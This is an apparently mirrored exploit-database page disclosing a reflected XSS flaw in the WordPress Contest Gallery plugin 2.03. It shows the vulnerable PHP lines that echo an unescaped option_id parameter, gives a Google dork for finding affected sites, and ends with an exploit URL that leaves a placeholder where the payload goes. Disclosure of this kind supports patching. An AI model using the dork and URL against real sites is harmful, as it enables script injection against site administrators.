Lucene search
+L

Wordpress Contest Gallery plugin XSS Vulnerability

🗓️ 01 Dec 2015 00:00:00Reported by sniper.tType 
zdt
 zdt
🔗 0day.today👁 21 Views

WordPress Contest Gallery plugin XSS Vulnerability version 2.0

Code
######################################################################
# Exploit Title: Wordpress plugin contest-gallery  XSS Vulnerability
# Software Link: https://wordpress.org/plugins/contest-gallery/
#Version:2.03
# Google dork: inurl:/wp-content/plugins/contest-gallery
######################################################################
 
 The code in ./wp-fastest-cache/contest-gallery/nav-gallery.php
 

            31: echo echo "<td align='center'><br/><div><form method='POST' action='?page=contest-gallery/index.php&define_upload=true&option_id=$GalleryID'><input type='hidden' name='option_id' value='$GalleryID'><input type='submit' value='Edit upload form' style='text-align:center;width:180px;background:linear-gradient(0deg, #bbe0ef 5%, #90d4f0 70%);' /></form><br/></div></td>";  // nav-gallery.php
        39: $GalleryID = $nextIDgallery;  // get-data.phpif($createdGallery), 
        36: $GalleryID = $_GET['option_id'];  // get-data.php
        39: $GalleryID = $nextIDgallery;  // get-data.phpif($createdGallery), 
        36: $GalleryID = $_GET['option_id'];  // get-data.php


 
 
Exploit
http://server/wp-content/plugins/contest-gallery/admin/nav-gallery.php?action=?page=contest-gallery/index.php&define_upload=true&option_id=&GalleryID==/*XSS_HERE*/


#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Dec 2015 00:00Current
7.1High risk
Vulners AI Score7.1
21